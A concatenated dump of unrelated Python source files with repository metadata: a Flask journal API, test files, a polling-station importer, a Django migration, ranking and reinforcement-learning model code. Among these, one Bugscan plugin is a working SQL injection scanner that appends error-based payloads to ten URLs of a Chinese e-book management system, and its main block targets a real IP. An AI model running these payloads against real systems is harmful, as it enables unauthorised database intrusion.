path_patterns:
A dictionary mapping entity names to entity values.
Entities with ``None`` or empty-string value will be removed.
Otherwise, entities will be cast to string values, therefore
if any format is expected (e.g., zero-padded integers), the
value should be formatted.
strict:
If True, all passed entities must be matched inside a
pattern in order to be a valid match. If False, extra entities will
be ignored so long as all mandatory entities are found.
Returns: built path
"""
path = writing.build_path(entities, path_patterns, strict)
if path is not None:
return path
else:
raise ValueError(f"Unable to build path with given entities: {entities}\n and path pattern {path_patterns}")
def assert_all_entities_equal(entities: t.List[t.Dict[str, str]], *entities_names: str) -> None:
if len(entities) == 0:
return
for name in entities_names:
first = entities[0].get(name)
if any(entity.get(name) != first for entity in entities):
raise AssertionError(f"Not all entities equal for key: {name}\n"
f"{[entitie.get(name) for entitie in entities]}")
| 40.072464
| 117
| 0.682821
|
baeb61c93d41b2a20bd8906339a7dacf6ed5c1ea
| 3,633
|
py
|
Python
|
journal/modules/api/__init__.py
|
Pandentia/journal
|
7b0d84346a5dab05de2ddc60a5c0dd40bd95d27d
|
[
"MIT"
] | 1
|
2018-09-24T22:14:46.000Z
|
2018-09-24T22:14:46.000Z
|
journal/modules/api/__init__.py
|
Pandentia/journal
|
7b0d84346a5dab05de2ddc60a5c0dd40bd95d27d
|
[
"MIT"
] | 10
|
2018-09-24T22:15:46.000Z
|
2018-10-06T19:06:36.000Z
|
journal/modules/api/__init__.py
|
Pandentia/journal
|
7b0d84346a5dab05de2ddc60a5c0dd40bd95d27d
|
[
"MIT"
] | null | null | null |
import typing
import functools
import ujson
from flask import Blueprint, Response, current_app, abort, request
from werkzeug.exceptions import HTTPException
from journal.helpers import recaptcha
bp = Blueprint(name='api', import_name=__name__, url_prefix='/api')
class UserException(Exception):
def __init__(self, msg):
super().__init__(msg)
def verify_fields(data, check: typing.Dict[str, typing.Any], *ignore: str) -> dict:
verified = {}
if not isinstance(data, dict):
raise UserException('Data payload is invalid.')
for k, v in check.items():
if k not in data:
raise UserException('Required field "{}" missing.'.format(k))
if not isinstance(data[k], v):
raise UserException('Field "{}" was of type "{}", "{}" expected.'
.format(k, type(data[k]).__name__, v.__name__))
verified[k] = data[k]
for k in ignore:
if k in data:
verified[k] = data[k]
return verified
def respond(data: typing.Optional[typing.Union[dict, list]] = None, *, status: int = 200):
resp = Response()
if not data:
status = 204
resp.status_code = status
if data:
if not isinstance(data, list) and not isinstance(data, dict):
data['response'] = data
resp.data = ujson.dumps(data)
resp.headers = {'Content-Type': 'application/json'}
return resp
@bp.before_request
def setup():
auth = request.headers.get('Authorization')
if auth:
request.user = current_app.db.get_user(token=auth)
else:
request.user = None
def auth_required(f):
@functools.wraps(f)
def decorated(*args, **kwargs):
if not request.user:
return abort(401)
return f(*args, **kwargs)
return decorated
def error(e):
return respond({'error': {'code': e.code, 'name': e.name}}, status=e.code)
@bp.errorhandler(HTTPException)
def errorhandler(e):
return error(e)
@bp.errorhandler(UserException)
def user_exception(e):
return respond({'error': {'code': 400, 'name': 'Bad Request', 'info': str(e)}}, status=400)
@bp.route('/login', methods=['POST'])
def login():
data = verify_fields(request.json, {'username': str, 'password': str}, 'recaptcha_response')
if recaptcha.is_enabled():
data = verify_fields(data, {'recaptcha_response': str}, 'username', 'password')
if not recaptcha.validate(data['recaptcha_response']):
raise UserException('reCAPTCHA was invalid.')
user = current_app.db.get_user(username=data['username'])
if user is None:
raise UserException('Username or password invalid.')
if not user.check_pw(data['password']):
raise UserException('Username or password invalid.')
return respond({'token': user.create_token()})
@bp.route('/users/@me', methods=['GET'])
@auth_required
def me():
return respond(request.user.to_json())
@bp.route('/entries', methods=['GET'])
@auth_required
def entries():
return respond([
{'id': x.id, 'author_id': x.id, 'title': x.title, 'tags': x.tags, 'timestamp': x.timestamp.isoformat()}
for x in request.user.entries()
])
# noinspection PyShadowingBuiltins
@bp.route('/entries/<id>', methods=['GET'])
@auth_required
def entry(id):
try:
id = int(id)
if id < 0:
raise ValueError()
except ValueError:
raise UserException('ID given is not an integer.')
entry = current_app.db.get_entry(id)
if not entry or not entry.can_access(request.user):
return abort(404)
return respond(entry.to_json())
| 26.911111
| 111
| 0.633911
|
8cb4d04d051b18ef633f5cf32a659096b1dbfd52
| 3,614
|
py
|
Python
|
InfrastructureManager/tests/test_ec2_agent_w_spot.py
|
UCSB-CS-RACELab/eager-appscale
|
d58fe64bb867ef58af19c1d84a5e1ec68ecddd3d
|
[
"Apache-2.0"
] | 3
|
2016-06-12T01:18:49.000Z
|
2018-07-16T18:20:23.000Z
|
InfrastructureManager/tests/test_ec2_agent_w_spot.py
|
nlake44/appscale
|
6944af660ca4cb772c9b6c2332ab28e5ef4d849f
|
[
"Apache-2.0"
] | null | null | null |
InfrastructureManager/tests/test_ec2_agent_w_spot.py
|
nlake44/appscale
|
6944af660ca4cb772c9b6c2332ab28e5ef4d849f
|
[
"Apache-2.0"
] | 1
|
2020-05-25T02:59:15.000Z
|
2020-05-25T02:59:15.000Z
|
from agents.factory import InfrastructureAgentFactory
import boto
import boto.ec2
from boto.ec2.connection import EC2Connection
from boto.ec2.instance import Reservation, Instance
from boto.ec2.keypair import KeyPair
from boto.ec2.securitygroup import SecurityGroup
from boto.exception import EC2ResponseError
from flexmock import flexmock
from infrastructure_manager import InfrastructureManager
import time
from utils import utils
try:
from unittest import TestCase
except ImportError:
from unittest.case import TestCase
__author__ = 'hiranya'
__email__ = 'hiranya@appscale.com'
class TestEC2Agent(TestCase):
def test_ec2_run_instances(self):
i = InfrastructureManager(blocking=True)
# first, validate that the run_instances call goes through successfully
# and gives the user a reservation id
full_params = {
'credentials': {'a': 'b', 'EC2_URL': 'http://testing.appscale.com:8773/foo/bar',
'EC2_ACCESS_KEY': 'access_key', 'EC2_SECRET_KEY': 'secret_key'},
'group': 'boogroup',
'image_id': 'booid',
'infrastructure': 'ec2',
'instance_type': 'booinstance_type',
'keyname': 'bookeyname',
'num_vms': '1',
'use_spot_instances': 'True',
'max_spot_price' : '1.23',
'region' : 'my-zone-1',
'zone' : 'my-zone-1b'
}
id = '0000000000' # no longer randomly generated
full_result = {
'success': True,
'reservation_id': id,
'reason': 'none'
}
self.assertEquals(full_result, i.run_instances(full_params, 'secret'))
# next, look at run_instances internally to make sure it actually is
# updating its reservation info
self.assertEquals(InfrastructureManager.STATE_RUNNING, i.reservations.get(id)['state'])
vm_info = i.reservations.get(id)['vm_info']
self.assertEquals(['public-ip'], vm_info['public_ips'])
self.assertEquals(['private-ip'], vm_info['private_ips'])
self.assertEquals(['i-id'], vm_info['instance_ids'])
def setUp(self):
fake_ec2 = flexmock(name='fake_ec2')
fake_ec2.should_receive('get_key_pair')
fake_ec2.should_receive('create_key_pair').with_args('bookeyname') \
.and_return(KeyPair())
fake_ec2.should_receive('get_all_security_groups').and_return([])
fake_ec2.should_receive('create_security_group') \
.with_args('boogroup', 'AppScale security group') \
.and_return(SecurityGroup())
fake_ec2.should_receive('authorize_security_group')
reservation = Reservation()
instance = flexmock(name='instance', private_dns_name='private-ip',
public_dns_name='public-ip', id='i-id', state='running',
key_name='bookeyname')
reservation.instances = [instance]
fake_ec2.should_receive('get_all_instances').and_return([]) \
.and_return([reservation])
fake_ec2.should_receive('terminate_instances').and_return([instance])
fake_ec2.should_receive('request_spot_instances')
flexmock(boto.ec2)
boto.ec2.should_receive('connect_to_region').and_return(fake_ec2)
(flexmock(utils)
.should_receive('get_secret')
.and_return('secret'))
(flexmock(utils)
.should_receive('sleep')
.and_return())
(flexmock(utils)
.should_receive('get_random_alphanumeric')
.and_return('0000000000'))
(flexmock(utils)
.should_receive('write_key_file')
.and_return())
def tearDown(self):
(flexmock(utils)
.should_receive('get_secret')
.reset())
(flexmock(utils)
.should_receive('sleep')
.reset())
(flexmock(utils)
.should_receive('get_random_alphanumeric')
.reset())
| 33.462963
| 91
| 0.697288
|
e2102eb2c87ded066f41a8b58223ee1b2fdee9c5
| 4,402
|
py
|
Python
|
polling_stations/apps/data_importers/management/commands/import_solihull.py
|
danielgriffin48/UK-Polling-Stations
|
0e5273357a4fdc00c2af794c71558b6f8f2a0a49
|
[
"BSD-3-Clause"
] | null | null | null |
polling_stations/apps/data_importers/management/commands/import_solihull.py
|
danielgriffin48/UK-Polling-Stations
|
0e5273357a4fdc00c2af794c71558b6f8f2a0a49
|
[
"BSD-3-Clause"
] | 364
|
2020-10-19T07:16:41.000Z
|
2022-03-31T06:10:55.000Z
|
polling_stations/apps/data_importers/management/commands/import_solihull.py
|
danielgriffin48/UK-Polling-Stations
|
0e5273357a4fdc00c2af794c71558b6f8f2a0a49
|
[
"BSD-3-Clause"
] | null | null | null |
from django.contrib.gis.geos import Point
from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = "E08000029"
addresses_name = "parl.2019-12-12/Version 1/Democracy_Club__12December2019.CSV"
stations_name = "parl.2019-12-12/Version 1/Democracy_Club__12December2019.CSV"
elections = ["parl.2019-12-12"]
allow_station_point_from_postcode = False
def station_record_to_dict(self, record):
# These polling places have a UPRN, and the addressbase postcode doesn't match
# the postcode from the council. In these cases the addressbase postcode matches
# the postcode used on the venue's website.
# Online references toStation ID 7680 (Whar Hall Road Community Centre) don't
# align with addressbase, but the postcodes are adjacent. So leaving postcode
# as is in the CSV.
if record.polling_place_id == "7518": # Barston Memorial Institute
record = record._replace(polling_place_postcode="B92 0JU")
if record.polling_place_id == "7550": # St Clements Church
record = record._replace(polling_place_postcode="B36 0BA")
if record.polling_place_id == "7561": # Kingshurst Evangelical Church
record = record._replace(polling_place_postcode="B37 6NP")
if (
record.polling_place_id == "7626"
): # The Royal British Legion (Knowle) Club Limited
record = record._replace(polling_place_postcode="B93 9LU")
if record.polling_place_id == "7660": # Woodlands Campus
record = record._replace(polling_place_postcode="B36 0NF")
# Fixes carried forward
# Three Trees Community Centre
if record.polling_place_id == "7571":
record = record._replace(polling_place_uprn="100071461342")
# Dorridge Methodist Church
if record.polling_place_id == "7586":
record = record._replace(polling_place_uprn="100071001475")
rec = super().station_record_to_dict(record)
# Tudor Grange Leisure Centre
if record.polling_place_id == "7726":
rec["location"] = Point(-1.7881577, 52.4124167, srid=4326)
# Catherine de Barnes Village Hall
if record.polling_place_id == "7515":
rec["location"] = Point(-1.7382134, 52.4203089, srid=4326)
return rec
def address_record_to_dict(self, record):
rec = super().address_record_to_dict(record)
uprn = record.property_urn.strip().lstrip("0")
if uprn == "10090949380":
rec["postcode"] = "B93 0FH"
if (record.addressline1, record.addressline2) == (
"101 Noble Way",
"Cheswick Green",
):
rec["uprn"] = "10090950327"
rec["accept_suggestion"] = True
if uprn in [
"10090945527", # B377RN -> B376RL : 3C Woodlands Way, Chelmsley Wood
"10090945525", # B377RN -> B376RL : 3A Woodlands Way, Chelmsley Wood
]:
rec["accept_suggestion"] = True
if record.addressline6 in [
"B90 4AY", # stray odd-looking property
"CV7 7HL", # single property with spurious-looking station
]:
return None
if uprn in [
"100071001341", # B911DA -> B911JW : 90 Grange Road, Solihull
"10090946742", # B901FT -> B930EJ : Apartment 16, Leasowes House, 3 Main Street, Dickens Heath, Solihull
"10090948318", # B901GL -> B913AB : Apartment 5, Market Court, 61 Old Dickens Heath Road, Shirley, Solihull
"10090947804", # CV49BN -> B901FT : 12 Eagle Drive, Solihull
"200003834455", # B927AW -> B927AH : St Michaels Residential Home, 251 Warwick Road, Solihull
"10090946771", # B920JP -> B930FD : Caravan Firs Farm, Barston Lane, Solihull
"10090948319", # B912AW -> B913AB : Flat 2, 58 Lode Lane, Solihull
"100070965323", # B376ES -> B376EU : 77 Overgreen Drive, Kingshurst
"100070965320", # B376ES -> B376EU : 77A Overgreen Drive, Kingshurst
"100070965321", # B376ES -> B376EU : 77B Overgreen Drive, Kingshurst
"100070965322", # B376ES -> B376EU : 77C Overgreen Drive, Kingshurst
]:
rec["accept_suggestion"] = False
return rec
| 46.829787
| 120
| 0.637438
|
a9aefe76b63591df69e485f31359a5e8e36a478c
| 1,301
|
py
|
Python
|
15/tests.py
|
remihuguet/aoc2020
|
c313c5b425dda92d949fd9ca4f18ff66f452794f
|
[
"MIT"
] | null | null | null |
15/tests.py
|
remihuguet/aoc2020
|
c313c5b425dda92d949fd9ca4f18ff66f452794f
|
[
"MIT"
] | null | null | null |
15/tests.py
|
remihuguet/aoc2020
|
c313c5b425dda92d949fd9ca4f18ff66f452794f
|
[
"MIT"
] | null | null | null |
import pytest
import memory
inputs = [
(0, 3, 6, 436),
(1, 3, 2, 1),
(2, 1, 3, 10),
(1, 2, 3, 27),
(2, 3, 1, 78),
(3, 2, 1, 438),
(3, 1, 2, 1836)
]
@pytest.fixture(params=inputs)
def starting(request):
return list(request.param[:3]), request.param[-1]
def test_apply_rule_for_one_turn():
starting = list(inputs[0][:3])
assert 0 == memory.next(starting)
assert 3 == memory.next(starting + [0])
assert 3 == memory.next(starting + [0, 3])
assert 1 == memory.next(starting + [0, 3, 3])
assert 0 == memory.next(starting + [0, 3, 3, 1])
assert 4 == memory.next(starting + [0, 3, 3, 1, 0])
assert 0 == memory.next(starting + [0, 3, 3, 1, 0, 4])
def test_find_2020_number(starting):
numbers, expec = starting
assert expec == memory.compute_number_at_turn(turn=2020, starting=numbers)
inputs_high = [
(0, 3, 6, 175594),
(1, 3, 2, 2578),
(2, 1, 3, 3544142),
(1, 2, 3, 261214),
(2, 3, 1, 6895259),
(3, 2, 1, 18),
(3, 1, 2, 362)
]
@pytest.fixture(params=inputs_high)
def starting_h(request):
return list(request.param[:3]), request.param[-1]
def test_find_high_number(starting_h):
numbers, expec = starting_h
assert expec == memory.compute_number_at_turn(turn=30000000, starting=numbers)
| 23.654545
| 82
| 0.601845
|
7ad45585d373b05738f33a228a114bffd168c7de
| 3,165
|
py
|
Python
|
ranking_baselines/DUET/test.py
|
dileep1996/mnsrf_ranking_suggestion
|
5bd241fb49f08fa4937539991e12e5a502d5a072
|
[
"MIT"
] | 1
|
2020-02-04T18:27:25.000Z
|
2020-02-04T18:27:25.000Z
|
ranking_baselines/DUET/test.py
|
dileep1996/mnsrf_ranking_suggestion
|
5bd241fb49f08fa4937539991e12e5a502d5a072
|
[
"MIT"
] | null | null | null |
ranking_baselines/DUET/test.py
|
dileep1996/mnsrf_ranking_suggestion
|
5bd241fb49f08fa4937539991e12e5a502d5a072
|
[
"MIT"
] | null | null | null |
###############################################################################
# Author: Wasi Ahmad
# Project: https://www.microsoft.com/en-us/research/wp-content/uploads/2016/10/wwwfp0192-mitra.pdf
# Date Created: 7/23/2017
#
# File Description: This script evaluates test ranking performance.
###############################################################################
import torch, helper, util, data, os, numpy
from model import DUET
from rank_metrics import mean_average_precision, NDCG, MRR
args = util.get_args()
# Set the random seed manually for reproducibility.
numpy.random.seed(args.seed)
torch.manual_seed(args.seed)
def test_ranking(model, test_batches):
num_batches = len(test_batches)
map, mrr, ndcg_1, ndcg_3, ndcg_5, ndcg_10 = 0, 0, 0, 0, 0, 0
for batch_no in range(1, num_batches + 1):
test_queries, test_docs, test_labels = helper.batch_to_tensor(test_batches[batch_no - 1], model.dictionary,
model.config.max_query_length,
model.config.max_doc_length)
if model.config.cuda:
test_queries = test_queries.cuda()
test_docs = test_docs.cuda()
test_labels = test_labels.cuda()
softmax_prob = model(test_queries, test_docs)
map += mean_average_precision(softmax_prob, test_labels)
mrr += MRR(softmax_prob, test_labels)
ndcg_1 += NDCG(softmax_prob, test_labels, 1)
ndcg_3 += NDCG(softmax_prob, test_labels, 3)
ndcg_5 += NDCG(softmax_prob, test_labels, 5)
ndcg_10 += NDCG(softmax_prob, test_labels, 10)
map = map / num_batches
mrr = mrr / num_batches
ndcg_1 = ndcg_1 / num_batches
ndcg_3 = ndcg_3 / num_batches
ndcg_5 = ndcg_5 / num_batches
ndcg_10 = ndcg_10 / num_batches
print('MAP - ', map)
print('MRR - ', mrr)
print('NDCG@1 - ', ndcg_1)
print('NDCG@3 - ', ndcg_3)
print('NDCG@5 - ', ndcg_5)
print('NDCG@10 - ', ndcg_10)
if __name__ == "__main__":
dictionary = data.Dictionary(5)
dictionary.load_dictionary(args.save_path, 'vocab.csv', 5000)
model = DUET(dictionary, args)
if 'CUDA_VISIBLE_DEVICES' in os.environ:
cuda_visible_devices = [int(x) for x in os.environ['CUDA_VISIBLE_DEVICES'].split(',')]
if len(cuda_visible_devices) > 1:
model = torch.nn.DataParallel(model, device_ids=cuda_visible_devices)
if args.cuda:
model = model.cuda()
checkpoint = helper.load_from_checkpoint(os.path.join(args.save_path, 'model_best.pth.tar'), args.cuda)
model.load_state_dict(checkpoint['state_dict'])
model.eval()
test_corpus = data.Corpus(args.tokenize, args.max_query_length, args.max_doc_length)
test_corpus.parse(args.data + 'test.txt', args.max_example)
print('test set size = ', len(test_corpus.data))
test_batches = helper.batchify(test_corpus.data, args.batch_size)
print('number of test batches = ', len(test_batches))
test_ranking(model, test_batches)
| 40.576923
| 116
| 0.610111
|
0494b20c832dcb8ce3a9cf4f51be82889baaaf7d
| 3,785
|
py
|
Python
|
ProjetoMercado/mercado/migrations/0009_categoria_cliente_compra_fornecedor_funcionario_produto_setor.py
|
LucasRodriguesDaPaixao/ProjetoMercado
|
7a086ab0af800b15ef090520c9c81a0cd83dd650
|
[
"MIT"
] | null | null | null |
ProjetoMercado/mercado/migrations/0009_categoria_cliente_compra_fornecedor_funcionario_produto_setor.py
|
LucasRodriguesDaPaixao/ProjetoMercado
|
7a086ab0af800b15ef090520c9c81a0cd83dd650
|
[
"MIT"
] | null | null | null |
ProjetoMercado/mercado/migrations/0009_categoria_cliente_compra_fornecedor_funcionario_produto_setor.py
|
LucasRodriguesDaPaixao/ProjetoMercado
|
7a086ab0af800b15ef090520c9c81a0cd83dd650
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.7 on 2020-07-20 03:56
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('mercado', '0008_auto_20200720_0056'),
]
operations = [
migrations.CreateModel(
name='Categoria',
fields=[
('ID_categoria', models.AutoField(primary_key=True, serialize=False)),
('nome_categoria', models.CharField(max_length=45, verbose_name='Nome Categoria:')),
],
),
migrations.CreateModel(
name='Cliente',
fields=[
('ID_cliente', models.AutoField(primary_key=True, serialize=False)),
('nome_cliente', models.CharField(max_length=100, verbose_name='Nome:')),
('cpf', models.CharField(max_length=15, verbose_name='CPF:')),
],
),
migrations.CreateModel(
name='Fornecedor',
fields=[
('ID_fornecedor', models.AutoField(primary_key=True, serialize=False)),
('nome_fornecedor', models.CharField(max_length=100, verbose_name='Nome:')),
('email_fornecedor', models.CharField(max_length=100, verbose_name='Email:')),
('cnpj', models.CharField(max_length=20, verbose_name='CNPJ:')),
('telefone', models.CharField(max_length=11, verbose_name='Telefone:')),
],
),
migrations.CreateModel(
name='Setor',
fields=[
('ID_setor', models.AutoField(primary_key=True, serialize=False)),
('nome_setor', models.CharField(max_length=45, verbose_name='Setor:')),
('FK_categoria', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mercado.Categoria')),
],
),
migrations.CreateModel(
name='Produto',
fields=[
('ID_produto', models.AutoField(primary_key=True, serialize=False)),
('nome_produto', models.CharField(max_length=100, verbose_name='Nome:')),
('data_validade', models.DateField(verbose_name='Data de validade:')),
('preco', models.DecimalField(decimal_places=2, max_digits=5, verbose_name='Preço:')),
('quantidade_produto', models.IntegerField(verbose_name='Quantidade de produtos:')),
('FK_categoria', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mercado.Categoria')),
('FK_fornecedor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mercado.Fornecedor')),
],
),
migrations.CreateModel(
name='Funcionario',
fields=[
('ID_funcionario', models.AutoField(primary_key=True, serialize=False)),
('nome_funcionario', models.CharField(max_length=45, verbose_name='Nome:')),
('rg', models.CharField(max_length=15, verbose_name='RG:')),
('cpf', models.CharField(max_length=15, verbose_name='CPF:')),
('FK_setor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mercado.Setor')),
],
),
migrations.CreateModel(
name='Compra',
fields=[
('ID_compra', models.AutoField(primary_key=True, serialize=False)),
('valor_total', models.DecimalField(decimal_places=2, max_digits=5, verbose_name='Valor total:')),
('FK_cliente', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mercado.Cliente')),
('compra_produto', models.ManyToManyField(to='mercado.Produto')),
],
),
]
| 46.728395
| 123
| 0.586526
|
c92fe0a2d25d872fa12d88c6134dd6759ab24310
| 1,457
|
py
|
Python
|
Bugscan_exploits-master/exp_list/exp-2469.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 11
|
2020-05-30T13:53:49.000Z
|
2021-03-17T03:20:59.000Z
|
Bugscan_exploits-master/exp_list/exp-2469.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-13T03:25:18.000Z
|
2020-07-21T06:24:16.000Z
|
Bugscan_exploits-master/exp_list/exp-2469.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-30T13:53:51.000Z
|
2020-12-01T21:44:26.000Z
|
#!/usr/bin/evn python
#--coding:utf-8--*--
#Name:天睿电子图书管理系统系统10处注入打包 避免重复
#Refer:http://www.wooyun.org/bugs/wooyun-2015-0120852/
#Author:xq17
def assign(service,arg):
if service=="tianrui_lib":
return True,arg
def audit(arg):
urls = [
arg + 'gl_tj_0.asp?id=1',
arg + 'gl_tuijian_1.asp',
arg + 'gl_tz_she.asp?zt=1&id=1',
arg + 'gl_us_shan.asp?id=1',
arg + 'gl_xiu.asp?id=1',
arg + 'mafen.asp?shuxing=1',
arg + 'ping_cha.asp?mingcheng=1',
arg + 'ping_hao.asp?mingcheng=1',
arg + 'pl_add.asp?id=1',
arg + 'search.asp?keywords=1&shuxing=1',
]
for url in urls:
url += '%20and%201=convert(int,CHAR(87)%2BCHAR(116)%2BCHAR(70)%2BCHAR(97)%2BCHAR(66)%2BCHAR(99)%2B@@version)'
code, head, res, err, _ = curl.curl2(url)
if((code == 200) or (code == 500)) and ('WtFaBcMicrosoft SQL Server' in res):
security_hole("SQL Injection: " + url)
url = arg + 'gl_tz_she.asp?zt=11%20WHERE%201=1%20AND%201=convert(int,CHAR(87)%2BCHAR(116)%2BCHAR(70)%2BCHAR(97)%2BCHAR(66)%2BCHAR(99)%2B@@version)--'
code, head, res, err, _ = curl.curl2(url)
if ((code == 200) or (code == 500)) and ('WtFaBcMicrosoft SQL Server' in res):
security_hole("SQL Injection: " + url)
if __name__ == '__main__':
from dummy import *
audit(assign('tianrui_lib','http://218.92.71.5:1085/trebook/')[1])
| 41.628571
| 154
| 0.587509
|
2caf4546b83e6c4a23926892eeadc71f9025be02
| 14,907
|
py
|
Python
|
a2c_ppo_acktr/model.py
|
fgolemo/pytorch-a2c-ppo-acktr-gail
|
366d22b7e6a049fb3de804619050cc6e61af86e2
|
[
"MIT"
] | 1
|
2019-07-05T19:57:26.000Z
|
2019-07-05T19:57:26.000Z
|
a2c_ppo_acktr/model.py
|
fgolemo/pytorch-a2c-ppo-acktr-gail
|
366d22b7e6a049fb3de804619050cc6e61af86e2
|
[
"MIT"
] | 1
|
2020-09-16T13:00:16.000Z
|
2020-09-16T13:00:16.000Z
|
a2c_ppo_acktr/model.py
|
fgolemo/pytorch-a2c-ppo-acktr-gail
|
366d22b7e6a049fb3de804619050cc6e61af86e2
|
[
"MIT"
] | 3
|
2019-07-07T20:16:27.000Z
|
2020-12-23T20:18:18.000Z
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from efficientnet_pytorch import EfficientNet
from torchvision.models import vgg16, mobilenet_v2
from a2c_ppo_acktr.distributions import Bernoulli, Categorical, DiagGaussian
from a2c_ppo_acktr.utils import init
class Flatten(nn.Module):
def forward(self, x):
return x.view(x.size(0), -1)
class Policy(nn.Module):
def __init__(self, obs_shape, action_space, base=None, base_kwargs=None, navi=False, hidden_size=64):
super(Policy, self).__init__()
print("====", obs_shape, len(obs_shape))
if base_kwargs is None:
base_kwargs = {}
if base is None:
if len(obs_shape) == 3 or len(obs_shape) == 2:
# TODO(add hidden size)
base = CNNBase
elif len(obs_shape) == 1:
base = MLPBase
else:
raise NotImplementedError
print("DEV: PPO using base:", type(base).__name__)
self.base = base(obs_shape[0], hidden_size=hidden_size, **base_kwargs)
# print(self.base.state_dict().keys())
if action_space.__class__.__name__ == "Discrete":
num_outputs = action_space.n
net_outputs = self.base.output_size
if navi:
net_outputs = 256 * 10
self.dist = Categorical(net_outputs, num_outputs)
elif action_space.__class__.__name__ == "Box":
num_outputs = action_space.shape[0]
self.dist = DiagGaussian(self.base.output_size, num_outputs)
elif action_space.__class__.__name__ == "MultiBinary":
num_outputs = action_space.shape[0]
self.dist = Bernoulli(self.base.output_size, num_outputs)
else:
raise NotImplementedError
@property
def is_recurrent(self):
return self.base.is_recurrent
@property
def recurrent_hidden_state_size(self):
"""Size of rnn_hx."""
return self.base.recurrent_hidden_state_size
def forward(self, inputs, rnn_hxs, masks):
raise NotImplementedError
def act(self, inputs, rnn_hxs, masks, deterministic=False):
value, actor_features, rnn_hxs = self.base(inputs, rnn_hxs, masks)
dist = self.dist(actor_features)
if deterministic:
action = dist.mode()
else:
action = dist.sample()
action_log_probs = dist.log_probs(action)
dist_entropy = dist.entropy().mean()
return value, action, action_log_probs, rnn_hxs
def get_value(self, inputs, rnn_hxs, masks):
value, _, _ = self.base(inputs, rnn_hxs, masks)
return value
def evaluate_actions(self, inputs, rnn_hxs, masks, action):
value, actor_features, rnn_hxs = self.base(inputs, rnn_hxs, masks)
dist = self.dist(actor_features)
action_log_probs = dist.log_probs(action)
dist_entropy = dist.entropy().mean()
return value, action_log_probs, dist_entropy, rnn_hxs
class RandomPolicy(Policy):
def __init__(self, obs_shape, action_space, base=None, base_kwargs=None, navi=False):
super(RandomPolicy, self).__init__(obs_shape, action_space, base, base_kwargs, navi)
self.action_space = action_space
@property
def is_recurrent(self):
pass
@property
def recurrent_hidden_state_size(self):
return torch.tensor(10)
def forward(self, inputs, rnn_hxs, masks):
pass
def act(self, inputs, rnn_hxs, masks, deterministic=False):
return (
torch.tensor([10]),
torch.tensor([[np.random.choice(self.action_space.n)]]),
torch.tensor([1]),
torch.tensor([range(10)]),
)
def get_value(self, inputs, rnn_hxs, masks):
return torch.tensor(-1)
def evaluate_actions(self, inputs, rnn_hxs, masks, action):
return None
class NNBase(nn.Module):
def __init__(self, recurrent, recurrent_input_size, hidden_size, n_layers):
super(NNBase, self).__init__()
self._hidden_size = hidden_size
self._recurrent = recurrent
if recurrent:
self.gru = nn.GRU(recurrent_input_size, hidden_size)
for name, param in self.gru.named_parameters():
if "bias" in name:
nn.init.constant_(param, 0)
elif "weight" in name:
nn.init.orthogonal_(param)
@property
def is_recurrent(self):
return self._recurrent
@property
def recurrent_hidden_state_size(self):
if self._recurrent:
return self._hidden_size
return 1
@property
def output_size(self):
return self._hidden_size
def _forward_gru(self, x, hxs, masks):
if x.size(0) == hxs.size(0):
x, hxs = self.gru(x.unsqueeze(0), (hxs * masks).unsqueeze(0))
x = x.squeeze(0)
hxs = hxs.squeeze(0)
else:
# x is a (T, N, -1) tensor that has been flatten to (T * N, -1)
N = hxs.size(0)
T = int(x.size(0) / N)
# unflatten
x = x.view(T, N, x.size(1))
# Same deal with masks
masks = masks.view(T, N)
# Let's figure out which steps in the sequence have a zero for any agent
# We will always assume t=0 has a zero in it as that makes the logic cleaner
has_zeros = (masks[1:] == 0.0).any(dim=-1).nonzero().squeeze().cpu()
# +1 to correct the masks[1:]
if has_zeros.dim() == 0:
# Deal with scalar
has_zeros = [has_zeros.item() + 1]
else:
has_zeros = (has_zeros + 1).numpy().tolist()
# add t=0 and t=T to the list
has_zeros = [0] + has_zeros + [T]
hxs = hxs.unsqueeze(0)
outputs = []
for i in range(len(has_zeros) - 1):
# We can now process steps that don't have any zeros in masks together!
# This is much faster
start_idx = has_zeros[i]
end_idx = has_zeros[i + 1]
rnn_scores, hxs = self.gru(x[start_idx:end_idx], hxs * masks[start_idx].view(1, -1, 1))
outputs.append(rnn_scores)
# assert len(outputs) == T
# x is a (T, N, -1) tensor
x = torch.cat(outputs, dim=0)
# flatten
x = x.view(T * N, -1)
hxs = hxs.squeeze(0)
return x, hxs
class CNNBase(NNBase):
def __init__(self, num_inputs, recurrent=False, hidden_size=512):
super(CNNBase, self).__init__(recurrent, hidden_size, hidden_size, 0)
init_ = lambda m: init(
m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0), nn.init.calculate_gain("relu")
)
self.main = nn.Sequential(
init_(nn.Conv2d(num_inputs, 32, 8, stride=4)),
nn.ReLU(),
init_(nn.Conv2d(32, 64, 4, stride=2)),
nn.ReLU(),
init_(nn.Conv2d(64, 32, 3, stride=1)),
nn.ReLU(),
Flatten(),
init_(nn.Linear(32 * 7 * 7, hidden_size)),
nn.ReLU(),
)
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0))
self.critic_linear = init_(nn.Linear(hidden_size, 1))
self.train()
def forward(self, inputs, rnn_hxs, masks):
# show(make_grid((inputs/255.0).view(4,3,84,84)))
if torch.max(inputs) > 1:
inputs /= 255.0
x = self.main(inputs)
# print (x.size()) # 1,512
if self.is_recurrent:
x, rnn_hxs = self._forward_gru(x, rnn_hxs, masks)
return self.critic_linear(x), x, rnn_hxs
class VGGBase(NNBase):
def __init__(self, num_inputs, recurrent=False, hidden_size=4096):
super(VGGBase, self).__init__(recurrent, hidden_size, hidden_size)
self.main = vgg16(pretrained=True, progress=True)
